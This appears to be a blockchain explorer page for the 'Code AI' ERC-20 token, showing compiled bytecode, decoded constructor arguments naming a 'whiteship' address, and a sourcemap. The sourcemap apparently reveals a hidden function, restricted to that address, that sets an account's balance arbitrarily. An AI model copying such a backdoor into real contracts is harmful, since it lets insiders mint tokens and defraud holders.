080fd5b610ae7836109e5565b9150610af5602084016109e5565b90509250929050565b600181811c90821680610b1257607f821691505b602082108103610b3257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b6000816000190483118215151615610b6857610b68610b38565b500290565b60008219821115610b8057610b80610b38565b50019056fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122042d32a436ba3aec8a4a465d64f7155897432e7e86ba1bdcc23a97f250623c75164736f6c634300080f0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000000120000000000000000000000001458aff8f9c5bbf5c26d2bdd21b5e2a2fb845b810000000000000000000000000000000000000000033b2e3c9fd0803ce80000000000000000000000000000000000000000000000000000000000000000000007436f6465204149000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006434f444541490000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): Code AI
Arg [1] : symbol_ (string): CODEAI
Arg [2] : decimals_ (uint8): 18
Arg [3] : whiteshipAddr (address): 0x1458AFf8F9c5BBf5c26D2bdd21b5e2a2fb845b81
Arg [4] : totalSupply_ (uint256): 1000000000000000000000000000
-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [3] : 0000000000000000000000001458aff8f9c5bbf5c26d2bdd21b5e2a2fb845b81
Arg [4] : 0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [6] : 436f646520414900000000000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [8] : 434f444541490000000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
13802:6089:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14821:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15856:210;;;;;;:::i;:::-;;:::i;:::-;;;1218:14:1;;1211:22;1193:41;;1181:2;1166:18;15856:210:0;1053:187:1;15122:108:0;15210:12;;15122:108;;;1391:25:1;;;1379:2;1364:18;15122:108:0;1245:177:1;14119:31:0;;;;;;16074:455;;;;;;:::i;:::-;;:::i;15023:91::-;15097:9;;15023:91;;15097:9;;;;1902:36:1;;1890:2;1875:18;15023:91:0;1760:184:1;16537:300:0;;;;;;:::i;:::-;;:::i;14161:28::-;;;;;-1:-1:-1;;;;;14161:28:0;;;;;;-1:-1:-1;;;;;2113:32:1;;;2095:51;;2083:2;2068:18;14161:28:0;1949:203:1;15238:177:0;;;;;;:::i;:::-;-1:-1:-1;;;;;15389:18:0;15357:7;15389:18;;;:9;:18;;;;;;;15238:177;5595:94;;;:::i;:::-;;14077:31;;;;;;4944:87;4990:7;5017:6;-1:-1:-1;;;;;5017:6:0;4944:87;;14920:95;;;:::i;18033:374::-;;;;;;:::i;:::-;;:::i;16845:401::-;;;;;;:::i;:::-;;:::i;15423:216::-;;;;;;:::i;:::-;;:::i;15647:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15813:18:0;;;15781:7;15813:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15647:201;5844:192;;;;;;:::i;:::-;;:::i;14821:91::-;14866:13;14899:5;14892:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14821:91;:::o;15856:210::-;15975:4;15997:39;3742:10;16020:7;16029:6;15997:8;:39::i;:::-;-1:-1:-1;16054:4:0;15856:210;;;;:::o;16074:455::-;16214:4;16231:36;16241:6;16249:9;16260:6;16231:9;:36::i;:::-;16278:221;16301:6;3742:10;16349:139;16405:6;16349:139;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16349:19:0;;;;;;:11;:19;;;;;;;;3742:10;16349:33;;;;;;;;;;:37;:139::i;:::-;16278:8;:221::i;:::-;-1:-1:-1;16517:4:0;16074:455;;;;;:::o;16537:300::-;3742:10;16652:4;16746:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16746:34:0;;;;;;;;;;16652:4;;16674:133;;16724:7;;16746:50;;16785:10;16746:38;:50::i;5595:94::-;4990:7;5017:6;-1:-1:-1;;;;;5017:6:0;3742:10;5164:23;5156:68;;;;-1:-1:-1;;;5156:68:0;;3689:2:1;5156:68:0;;;3671:21:1;;;3708:18;;;3701:30;3767:34;3747:18;;;3740:62;3819:18;;5156:68:0;;;;;;;;;5660:21:::1;5678:1;5660:9;:21::i;:::-;5595:94::o:0;14920:95::-;14967:13;15000:7;14993:14;;;;;:::i;18033:374::-;17331:11;;-1:-1:-1;;;;;17331:11:0;3742:10;-1:-1:-1;;;;;17315:27:0;;17297:77;;;;-1:-1:-1;;;17297:77:0;;4050:2:1;17297:77:0;;;4032:21:1;4089:2;4069:18;;;4062:30;4128:29;4108:18;;;4101:57;4175:18;;17297:77:0;3848:351:1;17297:77:0;18231:13:::1;:30:::0;;-1:-1:-1;;;;;;18231:30:0::1;-1:-1:-1::0;;;;;18231:30:0;::::1;;::::0;;18262:16:::1;:36:::0;;;18299:16:::1;:36:::0;;;18364:35:::1;18299:36:::0;18262;18364:35:::1;:::i;:::-;18347:13;::::0;-1:-1:-1;;;;;18347:13:0::1;18337:24;::::0;;;:9:::1;:24;::::0;;;;:62;-1:-1:-1;;;;18033:374:0:o;16845:401::-;16965:4;16987:229;3742:10;17037:7;17059:146;17116:15;17059:146;;;;;;;;;;;;;;;;;3742:10;17059:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;17059:34:0;;;;;;;;;;;;:38;:146::i;15423:216::-;15545:4;15567:42;3742:10;15591:9;15602:6;15567:9;:42::i;5844:192::-;4990:7;5017:6;-1:-1:-1;;;;;5017:6:0;3742:10;5164:23;5156:68;;;;-1:-1:-1;;;5156:68:0;;3689:2:1;5156:68:0;;;3671:21:1;;;3708:18;;;3701:30;3767:34;3747:18;;;3740:62;3819:18;;5156:68:0;3487:356:1;5156:68:0;-1:-1:-1;;;;;5933:22:0;::::1;5925:73;;;::::0;-1:-1:-1;;;5925:73:0;;4711:2:1;5925:73:0::1;::::0;::::1;4693:21:1::0;4750:2;4730:18;;;4723:30;4789:34;4769:18;;;4762:62;-1:-1:-1;;;4840:18:1;;;4833:36;4886:19;;5925:73:0::1;4509:402:1::0;5925:73:0::1;6009:19;6019:8;6009:9;:19::i;:::-;5844:192:::0;:::o;9030:98::-;9088:7;9115:5;9119:1;9115;:5;:::i;:::-;9108:12;9030:98;-1:-1:-1;;;9030:98:0:o;19267:382::-;-1:-1:-1;;;;;19403:19:0;;19395:69;;;;-1:-1:-1;;;19395:69:0;;5251:2:1;19395:69:0;;;5233:21:1;5290:2;5270:18;;;5263:30;5329:34;5309:18;;;5302:62;-1:-1:-1;;;5380:18:1;;;5373:35;5425:19;;19395:69:0;5049:401:1;19395:69:0;-1:-1:-1;;;;;19483:21:0;;19475:69;;;;-1:-1:-1;;;19475:69:0;;5657:2:1;19475:69:0;;;5639:21:1;5696:2;5676:18;;;5669:30;5735:34;5715:18;;;5708:62;-1:-1:-1;;;5786:18:1;;;5779:33;5829:19;;19475:69:0;5455:399:1;19475:69:0;-1:-1:-1;;;;;19557:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19609:32;;1391:25:1;;;19609:32:0;;1364:18:1;19609:32:0;;;;;;;;19267:382;;;:::o;17412:613::-;-1:-1:-1;;;;;17552:20:0;;17544:71;;;;-1:-1:-1;;;17544:71:0;;6061:2:1;17544:71:0;;;6043:21:1;6100:2;6080:18;;;6073:30;6139:34;6119:18;;;6112:62;-1:-1:-1;;;6190:18:1;;;6183:36;6236:19;;17544:71:0;5859:402:1;17544:71:0;-1:-1:-1;;;;;17634:23:0;;17626:72;;;;-1:-1:-1;;;17626:72:0;;6468:2:1;17626:72:0;;;6450:21:1;6507:2;6487:18;;;6480:30;6546:34;6526:18;;;6519:62;-1:-1:-1;;;6597:18:1;;;6590:34;6641:19;;17626:72:0;6266:400:1;17626:72:0;17791:109;17827:6;17791:109;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17791:17:0;;;;;;:9;:17;;;;;;;:109;:21;:109::i;:::-;-1:-1:-1;;;;;17771:17:0;;;;;;;:9;:17;;;;;;:129;;;;17934:20;;;;;;;:32;;17959:6;17934:24;:32::i;:::-;-1:-1:-1;;;;;17911:20:0;;;;;;;:9;:20;;;;;;;:55;;;;17982:35;;;;;;;;;;18010:6;1391:25:1;;1379:2;1364:18;;1245:177;11309:240:0;11429:7;11490:12;11482:6;;;;11474:29;;;;-1:-1:-1;;;11474:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11525:5:0;;;11309:240::o;6044:173::-;6100:16;6119:6;;-1:-1:-1;;;;;6136:17:0;;;-1:-1:-1;;;;;;6136:17:0;;;;;;6169:40;;6119:6;;;;;;;6169:40;;6100:16;6169:40;6089:128;6044:173;:::o;14:597:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;452:6;449:1;446:13;443:91;;;522:1;517:2;508:6;497:9;493:22;489:31;482:42;443:91;-1:-1:-1;595:2:1;574:15;-1:-1:-1;;570:29:1;555:45;;;;602:2;551:54;;14:597;-1:-1:-1;;;14:597:1:o;616:173::-;684:20;;-1:-1:-1;;;;;733:31:1;;723:42;;713:70;;779:1;776;769:12;713:70;616:173;;;:::o;794:254::-;862:6;870;923:2;911:9;902:7;898:23;894:32;891:52;;;939:1;936;929:12;891:52;962:29;981:9;962:29;:::i;:::-;952:39;1038:2;1023:18;;;;1010:32;;-1:-1:-1;;;794:254:1:o;1427:328::-;1504:6;1512;1520;1573:2;1561:9;1552:7;1548:23;1544:32;1541:52;;;1589:1;1586;1579:12;1541:52;1612:29;1631:9;1612:29;:::i;:::-;1602:39;;1660:38;1694:2;1683:9;1679:18;1660:38;:::i;:::-;1650:48;;1745:2;1734:9;1730:18;1717:32;1707:42;;1427:328;;;;;:::o;2157:186::-;2216:6;2269:2;2257:9;2248:7;2244:23;2240:32;2237:52;;;2285:1;2282;2275:12;2237:52;2308:29;2327:9;2308:29;:::i;2348:484::-;2431:6;2439;2447;2455;2508:3;2496:9;2487:7;2483:23;2479:33;2476:53;;;2525:1;2522;2515:12;2476:53;2564:9;2551:23;2617:5;2610:13;2603:21;2596:5;2593:32;2583:60;;2639:1;2636;2629:12;2583:60;2662:5;-1:-1:-1;2686:38:1;2720:2;2705:18;;2686:38;:::i;:::-;2348:484;;2676:48;;-1:-1:-1;;;;2771:2:1;2756:18;;2743:32;;2822:2;2807:18;2794:32;;2348:484::o;2837:260::-;2905:6;2913;2966:2;2954:9;2945:7;2941:23;2937:32;2934:52;;;2982:1;2979;2972:12;2934:52;3005:29;3024:9;3005:29;:::i;:::-;2995:39;;3053:38;3087:2;3076:9;3072:18;3053:38;:::i;:::-;3043:48;;2837:260;;;;;:::o;3102:380::-;3181:1;3177:12;;;;3224;;;3245:61;;3299:4;3291:6;3287:17;3277:27;;3245:61;3352:2;3344:6;3341:14;3321:18;3318:38;3315:161;;3398:10;3393:3;3389:20;3386:1;3379:31;3433:4;3430:1;3423:15;3461:4;3458:1;3451:15;3315:161;;3102:380;;;:::o;4204:127::-;4265:10;4260:3;4256:20;4253:1;4246:31;4296:4;4293:1;4286:15;4320:4;4317:1;4310:15;4336:168;4376:7;4442:1;4438;4434:6;4430:14;4427:1;4424:21;4419:1;4412:9;4405:17;4401:45;4398:71;;;4449:18;;:::i;:::-;-1:-1:-1;4489:9:1;;4336:168::o;4916:128::-;4956:3;4987:1;4983:6;4980:1;4977:13;4974:39;;;4993:18;;:::i;:::-;-1:-1:-1;5029:9:1;;4916:128::o
Swarm Source
ipfs://42d32a436ba3aec8a4a465d64f7155897432e7e86ba1bdcc23a97f250623c751
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.